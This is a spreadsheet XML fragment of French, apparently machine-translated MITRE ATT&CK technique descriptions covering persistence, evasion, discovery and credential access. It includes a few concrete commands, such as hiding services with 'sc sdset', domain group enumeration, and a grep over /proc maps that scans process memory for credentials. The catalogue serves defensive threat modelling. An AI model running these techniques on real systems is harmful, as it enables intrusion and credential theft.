Les adversaires peuvent abuser du mode sans échec pour désactiver les défenses des terminaux qui ne peuvent pas démarrer avec un démarrage limité. Les hôtes peuvent être forcés de passer en mode sans échec après le prochain redémarrage via des modifications apportées aux magasins de données de configuration de démarrage (BCD), qui sont des fichiers qui gèrent les paramètres de l’application de démarrage. (Citation : Microsoft bcdedit 2021)
Les adversaires peuvent également ajouter leurs applications malveillantes à la liste des services minimaux qui démarrent en mode sans échec en modifiant les valeurs de registre pertinentes (c’est-à-dire [Modifier le registre](https://attack.mitre.org/techniques/T1112)). Les objets malveillants [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) peuvent également être enregistrés et chargés en mode sans échec. (Citation : Sophos Snatch Ransomware 2019)(Référence : CyberArk Labs Mode sans échec 2016)(Citation : Cybereason Nocturnus MedusaLocker 2020)(Citation : BleepingComputer REvil 2021)
https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du netbooting pour charger un système d’exploitation de périphérique réseau non autorisé à partir d’un serveur TFTP (Trivial File Transfer Protocol). Le démarrage TFTP (netbooting) est couramment utilisé par les administrateurs réseau pour charger des images de périphériques réseau contrôlées par la configuration à partir d’un serveur de gestion centralisé. Le netbooting est une option de la séquence de démarrage et peut être utilisé pour centraliser, gérer et contrôler les images de l’appareil.
Les adversaires peuvent manipuler la configuration sur le périphérique réseau en spécifiant l’utilisation d’un serveur TFTP malveillant, qui peut être utilisé conjointement avec [Modifier l’image système](https://attack.mitre.org/techniques/T1601) pour charger une image modifiée au démarrage ou à la réinitialisation du périphérique. L’image non autorisée permet aux adversaires de modifier la configuration de l’appareil, d’ajouter des fonctionnalités malveillantes à l’appareil et d’introduire des portes dérobées pour garder le contrôle de l’appareil réseau tout en minimisant la détection grâce à l’utilisation d’une fonctionnalité standard. Cette technique est similaire à celle de [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) et peut entraîner l’exécution d’une image modifiée par le périphérique réseau. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des services Windows pour exécuter à plusieurs reprises des charges utiles malveillantes dans le cadre de la persistance. Lorsque Windows démarre, il démarre des programmes ou des applications appelés services qui exécutent des fonctions système en arrière-plan. (Citation : TechNet Services) Les informations de configuration du service Windows, y compris le chemin d’accès au fichier exécutable ou aux programmes/commandes de récupération du service, sont stockées dans le registre Windows.
Les adversaires peuvent installer un nouveau service ou modifier un service existant pour qu’il s’exécute au démarrage afin de persister sur un système. Les configurations de service peuvent être définies ou modifiées à l’aide d’utilitaires système (tels que sc.exe), en modifiant directement le registre ou en interagissant directement avec l’API Windows. 
Les adversaires peuvent également utiliser des services pour installer et exécuter des pilotes malveillants. Par exemple, après avoir déposé un fichier de pilote (ex : '.sys') sur le disque, la charge utile peut être chargée et enregistrée via des fonctions [API native](https://attack.mitre.org/techniques/T1106) telles que 'CreateServiceW()' (ou manuellement via des fonctions telles que 'ZwLoadDriver()' et 'ZwSetValueKey()'), en créant les valeurs de registre de service requises (c’est-à-dire [Modifier le registre](https://attack.mitre.org/techniques/T1112)), ou en utilisant des utilitaires de ligne de commande tels que 'PnPUtil.exe'. (Référence : Symantec W.32 Stuxnet Dossier)(Citation : Crowdstrike DriveSlayer février 2022)(Citation : Unit42 AcidBox, juin 2020) Les adversaires peuvent exploiter ces pilotes en tant que [Rootkit](https://attack.mitre.org/techniques/T1014) pour masquer la présence d’une activité malveillante sur un système. Les adversaires peuvent également charger un pilote signé mais vulnérable sur une machine compromise (connu sous le nom de « Bring Your Own Vulnerable Driver » (BYOVD)) dans le cadre de l'[Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068). (Citation : ESET InvisiMole, juin 2020)(Citation : Unit42 AcidBox, juin 2020)
Les services peuvent être créés avec des privilèges d’administrateur, mais sont exécutés sous des privilèges SYSTEM, de sorte qu’un adversaire peut également utiliser un service pour élever les privilèges. Les adversaires peuvent également démarrer directement des services via [Service Execution](https://attack.mitre.org/techniques/T1569/002).
Pour rendre l’analyse de détection plus difficile, les services malveillants peuvent également intégrer [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (par exemple, l’utilisation d’un service et/ou d’un nom de charge utile lié à un système d’exploitation légitime ou à un composant logiciel inoffensif). Les adversaires peuvent également créer des services « cachés » (c’est-à-dire [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), par exemple en utilisant la commande 'sc sdset' pour définir les autorisations de service via le langage SDDL (Service Descriptor Definition Language). Cela peut masquer un service Windows de la vue des méthodes d’énumération de service standard telles que « Get-Service », « sc query » et « services.exe ». (Citation : SANS 1)(Référence : SANS 2)
https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le DNS Fast Flux pour masquer un canal de commande et de contrôle derrière un tableau d’adresses IP changeant rapidement et lié à une résolution de domaine unique. Cette technique utilise un nom de domaine complet, avec plusieurs adresses IP qui lui sont attribuées qui sont échangées à haute fréquence, en utilisant une combinaison d’adressage IP à tour de rôle et de courte durée de vie (TTL) pour un enregistrement de ressource DNS. (Citation : MehtaFastFluxPt1)(Citation : MehtaFastFluxPt2)(Citation : Fast Flux - Welivesecurity)
La méthode la plus simple, « à flux unique », consiste à enregistrer et à désinscrire une adresse dans le cadre de la liste d’enregistrements DNS A (adresse) pour un seul nom DNS. Ces enregistrements ont une durée de vie moyenne de cinq minutes, ce qui entraîne un mélange constant de la résolution des adresses IP. (Citation : Fast Flux - Welivesecurity)
En revanche, la méthode « double-flux » enregistre et désenregistre une adresse dans le cadre de la liste d’enregistrements du serveur de noms DNS pour la zone DNS, ce qui offre une résilience supplémentaire à la connexion. Avec le double flux, des hôtes supplémentaires peuvent agir comme un proxy à l’hôte C2, isolant ainsi davantage la véritable source du canal C2.
https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses vérifications du système pour détecter et éviter les environnements de virtualisation et d’analyse. Il peut s’agir de modifier les comportements en fonction des résultats des vérifications de la présence d’artefacts indiquant un environnement de machine virtuelle (VME) ou un bac à sable. Si l’adversaire détecte un VME, il peut modifier son logiciel malveillant pour se désengager de la victime ou dissimuler les fonctions essentielles de l’implant. Ils peuvent également rechercher des artefacts VME avant de supprimer des charges utiles secondaires ou supplémentaires. Les adversaires peuvent utiliser les informations apprises grâce à la [virtualisation/évasion du bac à sable](https://attack.mitre.org/techniques/T1497) lors de la découverte automatisée pour façonner des comportements ultérieurs. (Citation : Sensibilisation à l’environnement de Deloitte)
Les vérifications spécifiques varient en fonction de la cible et/ou de l’adversaire, mais peuvent impliquer des comportements tels que [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [Découverte des informations système](https://attack.mitre.org/techniques/T1082) et [Registre des requêtes](https://attack.mitre.org/techniques/T1012) pour obtenir des informations système et rechercher des artefacts VME. Les adversaires peuvent rechercher des artefacts VME dans la mémoire, les processus, le système de fichiers, le matériel et/ou le registre. Les adversaires peuvent utiliser des scripts pour automatiser ces vérifications en un seul script, puis faire en sorte que le programme se termine s’il détermine que le système est un environnement virtuel. 
Les vérifications peuvent inclure des propriétés système génériques telles que le nom d’hôte/domaine et des échantillons de trafic réseau. Les adversaires peuvent également vérifier les adresses des cartes réseau, le nombre de cœurs du processeur et la taille de la mémoire ou du lecteur disponible. Une fois exécutés, les logiciels malveillants peuvent également utiliser [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083) pour vérifier s’ils ont été enregistrés dans un dossier ou un fichier contenant des artefacts de dénomination inattendus ou même liés à l’analyse, tels que « malware », « sample » ou « hash ».
D’autres vérifications courantes peuvent énumérer les services en cours d’exécution qui sont uniques à ces applications, les programmes installés sur le système, les champs fabricant/produit pour les chaînes relatives aux applications de machine virtuelle et les instructions matérielles/processeurs spécifiques à VME. (Référence : McAfee Virtual janvier 2017) Dans des applications telles que VMWare, les adversaires peuvent également utiliser un port d’E/S spécial pour envoyer des commandes et recevoir des sorties. 
Les vérifications matérielles, telles que la présence du ventilateur, la température et les appareils audio, peuvent également être utilisées pour recueillir des preuves qui peuvent indiquer un environnement virtuel. Les adversaires peuvent également demander des lectures spécifiques à partir de ces appareils. (Référence : Unit 42 OilRig septembre 2018)
https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’utilitaire &lt;code&gt;cron&lt;/code&gt; pour effectuer la planification de tâches pour l’exécution initiale ou récurrente de code malveillant. (Citation : 20 outils et techniques courants macOS) &lt;code&gt;L’utilitaire cron&lt;/code&gt; est un planificateur de tâches basé sur le temps pour les systèmes d’exploitation de type Unix.  Le fichier &lt;code&gt; crontab&lt;/code&gt; contient le calendrier des entrées cron à exécuter et les heures d’exécution spécifiées. Tous les fichiers &lt;code&gt;crontab&lt;/code&gt; sont stockés dans des chemins d’accès spécifiques au système d’exploitation.
Un adversaire peut utiliser &lt;code&gt;cron&lt;/code&gt; dans des environnements Linux ou Unix pour exécuter des programmes au démarrage du système ou de manière planifiée pour la [Persistance](https://attack.mitre.org/tactics/TA0003).
https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes au niveau du domaine et des paramètres d’autorisation. La connaissance des groupes d’autorisations au niveau du domaine peut aider les adversaires à déterminer quels groupes existent et quels utilisateurs appartiennent à un groupe particulier. Les adversaires peuvent utiliser ces informations pour déterminer quels utilisateurs disposent d’autorisations élevées, tels que les administrateurs de domaine.
Des commandes telles que &lt;code&gt;net group /domain&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscacheutil -q group&lt;/code&gt; sous macOS et &lt;code&gt;ldapsearch&lt;/code&gt; sous Linux peuvent répertorier les groupes de niveau domaine.
https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir des informations sur les vulnérabilités qui peuvent être utilisées lors du ciblage. Une vulnérabilité est une faiblesse dans le matériel ou les logiciels d’un ordinateur qui peut, potentiellement, être exploitée par un adversaire pour provoquer un comportement involontaire ou imprévu. Les adversaires peuvent trouver des informations sur les vulnérabilités en effectuant des recherches dans des bases de données ouvertes ou en accédant à des bases de données de vulnérabilités fermées. (Citation : Base de données nationale sur les vulnérabilités)
Un adversaire peut surveiller les divulgations de vulnérabilités/bases de données pour comprendre l’état des vulnérabilités existantes et nouvellement découvertes. Il y a généralement un délai entre le moment où une vulnérabilité est découverte et celui où elle est rendue publique. Un adversaire peut cibler les systèmes de ceux qui sont connus pour mener des recherches de vulnérabilité (y compris les fournisseurs commerciaux). La connaissance d’une vulnérabilité peut amener un adversaire à rechercher un exploit existant (c’est-à-dire [Exploits](https://attack.mitre.org/techniques/T1588/005)) ou à tenter d’en développer un lui-même (https://attack.mitre.org/techniques/T1587/004).
https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer les journaux du système pour masquer les preuves d’une intrusion. macOS et Linux gardent tous deux une trace des actions du système ou de l’utilisateur via les journaux système. La majorité de la journalisation native du système est stockée dans le répertoire &lt;code&gt;/var/log/&lt;/code&gt;. Les sous-dossiers de ce répertoire classent les journaux en fonction de leurs fonctions associées, telles que :(Citation : Linux Logs)
* &lt;code&gt;/var/log/messages :&lt;/code&gt;: Messages généraux et liés au système
* &lt;code&gt;/var/log/secure&lt;/code&gt; ou &lt;code&gt;/var/log/auth.log&lt;/code&gt; : journaux d’authentification
* &lt;code&gt;/var/log/utmp&lt;/code&gt; ou &lt;code&gt;/var/log/wtmp&lt;/code&gt; : enregistrements de connexion
* &lt;code&gt;/var/log/kern.log&lt;/code&gt; : Journaux du noyau
* &lt;code&gt;/var/log/cron.log&lt;/code&gt; : Journaux de Crond
* &lt;code&gt;/var/log/maillog&lt;/code&gt; : journaux du serveur de messagerie
* &lt;code&gt;/var/log/httpd/&lt;/code&gt; : Accès au serveur Web et journaux d’erreurs
https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter des vulnérabilités logicielles qui peuvent provoquer le blocage d’une application ou d’un système et empêcher les utilisateurs d’en avoir la disponibilité. (Citation : Sucuri BIND9 août 2015) Certains systèmes peuvent redémarrer automatiquement des applications et des services critiques en cas de panne, mais ils peuvent probablement être réexploités pour provoquer une condition de déni de service persistant (DoS).
Les adversaires peuvent exploiter des vulnérabilités connues ou zero-day pour faire planter des applications et/ou des systèmes, ce qui peut également conduire à ce que des applications et/ou des systèmes dépendants soient dans une condition de déni de service. Les applications ou systèmes bloqués ou redémarrés peuvent également avoir d’autres effets tels que [Destruction de données](https://attack.mitre.org/techniques/T1485), [Corruption du micrologiciel](https://attack.mitre.org/techniques/T1495), [Arrêt de service](https://attack.mitre.org/techniques/T1489), etc., qui peuvent provoquer une condition de déni de service et empêcher la disponibilité d’informations, d’applications et/ou de systèmes critiques.
https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les applications basées sur Microsoft Office pour la persistance entre les startups. Microsoft Office est une suite d’applications assez courante sur les systèmes d’exploitation Windows au sein d’un réseau d’entreprise. Il existe plusieurs mécanismes qui peuvent être utilisés avec Office pour la persistance lorsqu’une application basée sur Office est démarrée ; cela peut inclure l’utilisation de macros et de compléments de modèle Office.
Diverses fonctionnalités ont été découvertes dans Outlook qui peuvent être utilisées de manière abusive pour obtenir la persistance, telles que les règles Outlook, les formulaires et la page d’accueil. (Citation : SensePost Ruler GitHub) Ces mécanismes de persistance peuvent fonctionner dans Outlook ou être utilisés via Office 365. (Citation : Règles TechNet O365 Outlook)
https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser InstallUtil pour exécuter du code par proxy via un utilitaire Windows approuvé. InstallUtil est un utilitaire de ligne de commande qui permet d’installer et de désinstaller des ressources en exécutant des composants d’installation spécifiques spécifiés dans les fichiers binaires .NET. (Citation : MSDN InstallUtil) Le fichier binaire InstallUtil peut également être signé numériquement par Microsoft et situé dans les répertoires .NET d’un système Windows : &lt;code&gt;C :\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; et &lt;code&gt;C :\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil peut également être utilisé pour contourner le contrôle de l’application en utilisant des attributs dans le binaire qui exécutent la classe décorée avec l’attribut &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation : LOLBAS Installutil)
https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter à des machines distantes à l’aide de Secure Shell (SSH). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
SSH est un protocole qui permet aux utilisateurs autorisés d’ouvrir des shells distants sur d’autres ordinateurs. De nombreuses versions de Linux et macOS sont livrées avec SSH installé par défaut, bien qu’il soit généralement désactivé jusqu’à ce que l’utilisateur l’active. Le serveur SSH peut être configuré pour utiliser l’authentification par mot de passe standard ou des paires de clés public-privé à la place ou en plus d’un mot de passe. Dans ce scénario d’authentification, la clé publique de l’utilisateur doit se trouver dans un fichier spécial sur l’ordinateur exécutant le serveur qui répertorie les paires de clés autorisées à se connecter en tant qu’utilisateur.
https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des rôles ou des autorisations supplémentaires à un compte cloud contrôlé par l’adversaire pour maintenir un accès persistant à un locataire. Par exemple, les adversaires peuvent mettre à jour les stratégies IAM dans les environnements basés sur le cloud ou ajouter un nouvel administrateur général dans les environnements Office 365. (Référence : Politiques et autorisations AWS IAM)(Citation : Politiques IAM de Google Cloud)(Citation : Microsoft Support O365 Ajouter un autre administrateur, octobre 2019)(Citation : Rôles d’administrateur Microsoft O365) Avec des autorisations suffisantes, un compte compromis peut obtenir un accès presque illimité aux données et aux paramètres (y compris la possibilité de réinitialiser les mots de passe d’autres administrateurs). (Citation : Expulser l’attaquant AWS)
(Citation : Rôles d’administrateur Microsoft O365) 
Cette modification de compte peut immédiatement suivre [Créer un compte](https://attack.mitre.org/techniques/T1136) ou toute autre activité malveillante du compte. Les adversaires peuvent également modifier les [Comptes valides](https://attack.mitre.org/techniques/T1078) existants qu’ils ont compromis. Cela peut entraîner une élévation de privilèges, en particulier si les rôles ajoutés permettent un mouvement latéral vers des comptes supplémentaires.
Par exemple, dans les environnements AWS, un adversaire disposant des autorisations appropriées peut être en mesure d’utiliser l’API &lt;code&gt;CreatePolicyVersion&lt;/code&gt; pour définir une nouvelle version d’une stratégie IAM ou l’API &lt;code&gt;AttachUserPolicy&lt;/code&gt; pour attacher une stratégie IAM avec des autorisations supplémentaires ou distinctes à un compte d’utilisateur compromis. (Citation : Rhino Security Labs AWS Privilege Escalation)
Dans certains cas, les adversaires peuvent ajouter des rôles à des comptes contrôlés par des adversaires en dehors du locataire cloud victime. Cela permet à ces comptes externes d’effectuer des actions à l’intérieur du locataire victime sans que l’adversaire ait à [Créer un compte](https://attack.mitre.org/techniques/T1136) ou à modifier un compte appartenant à la victime. (Citation : Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des processeurs d’impression pour exécuter des DLL malveillantes lors du démarrage du système à des fins de persistance et/ou d’élévation de privilèges. Les processeurs d’impression sont des DLL chargées par le service de spouleur d’impression, « spoolsv.exe », pendant le démarrage. (Citation : Microsoft Intro Print Processors)
Les adversaires peuvent abuser du service de spouleur d’impression en ajoutant des processeurs d’impression qui chargent des DLL malveillantes au démarrage. Un processeur d’impression peut être installé via l’appel d’API &lt;code&gt;AddPrintProcessor&lt;/code&gt; avec un compte pour lequel &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; est activé. Il est également possible d’enregistrer un processeur d’impression auprès du service de spouleur d’impression en ajoutant la clé &lt;code&gt;de registre HKLM\SYSTEM\\[CurrentControlSet ou ControlSet001]\Control\Print\Environments\\[Architecture Windows : par exemple, Windows x64]\Print Processors\\[défini par l’utilisateur]\Driver&lt;/code&gt; Registry qui pointe vers la DLL.
Pour que le processeur d’impression malveillant soit correctement installé, la charge utile doit se trouver dans le répertoire dédié du processeur d’impression du système, qui se trouve avec l’appel d’API &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; ou qui est référencé via un chemin d’accès relatif de ce répertoire. (Citation : Microsoft AddPrintProcessor mai 2018) Une fois les processeurs d’impression installés, le service de spouleur d’impression, qui démarre pendant le démarrage, doit être redémarré pour qu’ils puissent s’exécuter. (Citation : ESET PipeMon mai 2020)
Le service de spouleur d’impression s’exécute avec des autorisations de niveau SYSTÈME, par conséquent, les processeurs d’impression installés par un adversaire peuvent s’exécuter avec des privilèges élevés.
https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent envoyer des e-mails de spearphishing avec une pièce jointe malveillante pour tenter d’accéder aux systèmes des victimes. L’accessoire de spearphishing est une variante spécifique du spearphishing. La pièce jointe de spearphishing est différente des autres formes de spearphishing en ce sens qu’elle utilise l’utilisation de logiciels malveillants joints à un e-mail. Toutes les formes de spearphishing sont des actions d’ingénierie sociale transmises par voie électronique et ciblent une personne, une entreprise ou un secteur d’activité spécifique. Dans ce scénario, les adversaires joignent un fichier à l’e-mail de spearphishing et s’appuient généralement sur [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204) pour obtenir l’exécution. (Citation : Unité 42 DarkHydrus juillet 2018) Le spearphishing peut également impliquer des techniques d’ingénierie sociale, comme se faire passer pour une source fiable.
Il existe de nombreuses options pour la pièce jointe, telles que les documents Microsoft Office, les exécutables, les PDF ou les fichiers archivés. Lors de l’ouverture de la pièce jointe (et éventuellement en cliquant sur les protections précédentes), la charge utile de l’adversaire exploite une vulnérabilité ou s’exécute directement sur le système de l’utilisateur. Le texte de l’e-mail de spearphishing tente généralement de donner une raison plausible pour laquelle le fichier devrait être ouvert, et peut expliquer comment contourner les protections du système pour ce faire. L’e-mail peut également contenir des instructions sur la façon de déchiffrer une pièce jointe, comme le mot de passe d’un fichier zip, afin d’échapper aux défenses des limites de l’e-mail. Les adversaires manipulent fréquemment les extensions de fichiers et les icônes afin de faire passer les exécutables joints pour des fichiers de document, ou pour que les fichiers exploitant une application apparaissent comme un fichier pour une autre.
https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de rendre une charge utile difficile à analyser en supprimant des symboles, des chaînes et d’autres informations lisibles par l’homme. Les scripts et les exécutables peuvent contenir des noms de variables et d’autres chaînes qui aident les développeurs à documenter les fonctionnalités du code. Les symboles sont souvent créés par l’éditeur de liens d’un système d’exploitation lors de la compilation des charges utiles exécutables. L’ingénierie inverse utilise ces symboles et chaînes pour analyser le code et identifier les fonctionnalités des charges utiles. (Citation : Explication des binaires dépouillés de Mandiant golang)(Citation : intezer stripped binaries elf files 2018)
Les adversaires peuvent utiliser des charges utiles supprimées afin de rendre l’analyse des logiciels malveillants plus difficile. Par exemple, les compilateurs et autres outils peuvent fournir des fonctionnalités permettant de supprimer ou d’obscurcir des chaînes et des symboles. Les adversaires ont également utilisé des formats de charge utile dépouillés, tels que les AppleScripts en exécution seule, une version compilée et dépouillée de [AppleScript](https://attack.mitre.org/techniques/T1059/002), pour échapper à la détection et à l’analyse. Le manque d’informations lisibles par l’homme peut entraver directement la détection et l’analyse des charges utiles. (Citation : SentinelLabs inversant les applescripts en run-only 2021)
https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le modèle COM (Windows Component Object Model) pour l’exécution de code local. COM est un composant de communication inter-processus (IPC) de l’interface de programmation d’application (API) native de Windows qui permet l’interaction entre des objets logiciels, ou du code exécutable qui implémente une ou plusieurs interfaces. (Référence : Fireeye Hunting COM juin 2019) Par COM, un objet client peut appeler des méthodes d’objets serveur, qui sont généralement des bibliothèques de liens dynamiques (DLL) binaires ou des exécutables (EXE). (Citation : Microsoft COM) L’exécution de COM à distance est facilitée par des [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM). (Référence : Fireeye Hunting COM juin 2019)
Diverses interfaces COM sont exposées et peuvent être utilisées de manière abusive pour invoquer une exécution arbitraire via divers langages de programmation tels que C, C++, Java et [Visual Basic](https://attack.mitre.org/techniques/T1059/005). (Citation : Microsoft COM) Des objets COM spécifiques existent également pour exécuter directement des fonctions au-delà de l’exécution de code, telles que la création d’une [tâche/tâche planifiée](https://attack.mitre.org/techniques/T1053), le téléchargement/l’exécution sans fichier et d’autres comportements de l’adversaire liés à l’élévation de privilèges et à la persistance. (Référence : Fireeye Hunting COM juin 2019)(Citation : ProjectZero File Write EoP Apr 2018)
https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant l’ordre de recherche utilisé pour charger les DLL. Les systèmes Windows utilisent une méthode courante pour rechercher les DLL requises à charger dans un programme. (Citation : Ordre de recherche de la bibliothèque de liens dynamiques Microsoft)(Citation : Détournement de FireEye juillet 2010) Le détournement de charges DLL peut avoir pour but d’établir la persistance, d’élever les privilèges et/ou d’éluder les restrictions sur l’exécution des fichiers.
Il existe de nombreuses façons pour un adversaire de détourner des charges DLL. Les adversaires peuvent installer des fichiers de bibliothèque de liens dynamiques (DLL) de cheval de Troie dans un répertoire qui sera recherché avant l’emplacement d’une bibliothèque légitime qui sera demandée par un programme, ce qui oblige Windows à charger leur bibliothèque malveillante lorsqu’elle est demandée par le programme victime. Les adversaires peuvent également effectuer le préchargement de DLL, également appelé attaques d’implantation binaire, (Citation : OWASP Binary Planting) en plaçant une DLL malveillante portant le même nom qu’une DLL spécifiée de manière ambiguë dans un emplacement que Windows recherche avant la DLL légitime. Souvent, cet emplacement est le répertoire de travail actuel du programme. (Citation : FireEye fxsst juin 2011) Les attaques de préchargement de DLL distantes se produisent lorsqu’un programme définit son répertoire actuel sur un emplacement distant, tel qu’un partage Web, avant de charger une DLL. (Référence : Avis de sécurité Microsoft 2269637)
Le détournement de DLL fantôme est un type spécifique de détournement d’ordre de recherche DLL où les adversaires ciblent des références à des fichiers DLL inexistants. (Citation : Détournement de DLL Hexacorn)(Citation : Les adversaires détournent les DLL) Ils peuvent être en mesure de charger leur propre DLL malveillante en l’implantant avec le nom correct à l’emplacement du module manquant.
Les adversaires peuvent également modifier directement l’ordre de recherche via la redirection DLL, qui, après avoir été activée (dans le registre et la création d’un fichier de redirection), peut amener un programme à charger une DLL différente. (Citation : Redirection de la bibliothèque Microsoft Dynamic-Link)(Citation : Manifestes Microsoft)(Citation : Détournement d’ordre de recherche DLL FireEye)
Si un programme vulnérable à l’ordre de recherche est configuré pour s’exécuter à un niveau de privilège supérieur, la DLL contrôlée par l’adversaire qui est chargée sera également exécutée au niveau supérieur. Dans ce cas, la technique peut être utilisée pour l’élévation de privilèges de l’utilisateur à l’administrateur ou du SYSTÈME ou de l’administrateur au SYSTÈME, selon le programme. Les programmes victimes d’un détournement de chemin peuvent sembler se comporter normalement, car les DLL malveillantes peuvent être configurées pour charger également les DLL légitimes qu’elles étaient censées remplacer.
https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>Une fois établi au sein d’un système ou d’un réseau, un adversaire peut utiliser des techniques automatisées pour collecter des données internes. Les méthodes d’exécution de cette technique peuvent inclure l’utilisation d’un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059) pour rechercher et copier des informations correspondant à des critères définis tels que le type de fichier, l’emplacement ou le nom à des intervalles de temps spécifiques. 
Dans les environnements basés sur le cloud, les adversaires peuvent également utiliser des API cloud, des pipelines de données, des interfaces de ligne de commande ou des services d’extraction, de transformation et de chargement (ETL) pour collecter automatiquement des données. (Citation : Mandiant UNC3944 SMS Phishing 2023) 
Cette fonctionnalité pourrait également être intégrée dans les outils d’accès à distance. 
Cette technique peut intégrer l’utilisation d’autres techniques telles que [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) et [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) pour identifier et déplacer des fichiers, ainsi que [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) et [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) pour identifier les ressources dans les environnements cloud.
https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des données stockées dans le presse-papiers auprès d’utilisateurs qui copient des informations au sein d’applications ou entre elles. 
Par exemple, sous Windows, les adversaires peuvent accéder aux données du presse-papiers à l’aide &lt;code&gt;de clip.exe&lt;/code&gt; ou &lt;code&gt;de Get-Clipboard&lt;/code&gt;. (Citation : presse-papiers MSDN)(Référence : clip_win_server)(Référence : CISA_AA21_200B) De plus, les adversaires peuvent surveiller, puis remplacer le presse-papiers des utilisateurs par leurs données (par exemple, [Manipulation des données transmises](https://attack.mitre.org/techniques/T1565/002)). (Référence : mining_ruby_reversinglabs)
macOS et Linux ont également des commandes, telles que &lt;code&gt;pbpaste&lt;/code&gt;, pour récupérer le contenu du presse-papiers. (Citation : Opérer avec EmPyre)
https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des informations d’identification à partir du système de fichiers proc ou de '/proc'. Le système de fichiers proc est un pseudo-système de fichiers utilisé comme interface pour les structures de données du noyau pour les systèmes basés sur Linux gérant la mémoire virtuelle. Pour chaque processus, le fichier '/proc/&lt;PID&gt;/maps' montre comment la mémoire est mappée dans l’espace d’adressage virtuel du processus. Et '/proc/&lt;PID&gt;/mem', exposé à des fins de débogage, permet d’accéder à l’espace d’adressage virtuel du processus.( Citation : Picus Labs Proc cump 2022)(Citation : baeldung Linux proc map 2022)
Lors de l’exécution avec des privilèges root, les adversaires peuvent rechercher dans ces emplacements mémoire tous les processus d’un système qui contiennent des modèles indiquant des informations d’identification. Les adversaires peuvent utiliser des modèles d’expression régulière, tels que &lt;code&gt;grep -E « ^[0-9a-f-]* r » /proc/"$pid"/maps | cut -d'' -f 1&lt;/code&gt;, pour rechercher des chaînes fixes dans les structures de mémoire ou les hachages mis en cache. (Citation : système de fichiers proc atomic-red) Lorsqu’ils s’exécutent sans accès privilégié, les processus peuvent toujours afficher leurs propres emplacements de mémoire virtuelle. Certains services ou programmes peuvent enregistrer les informations d’identification en texte clair dans la mémoire du processus. (Citation : MimiPenguin GitHub mai 2017)(Citation : polop linux privEsc gitbook)
S’il s’exécute en tant que navigateur Web ou avec les autorisations d’un navigateur Web, un processus peut rechercher les emplacements '/maps' et '/mem' à la recherche de modèles d’informations d’identification de site Web courants (qui peuvent également être utilisés pour trouver de la mémoire adjacente dans la même structure) dans lesquels des hachages ou des informations d’identification en texte clair peuvent se trouver.
https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
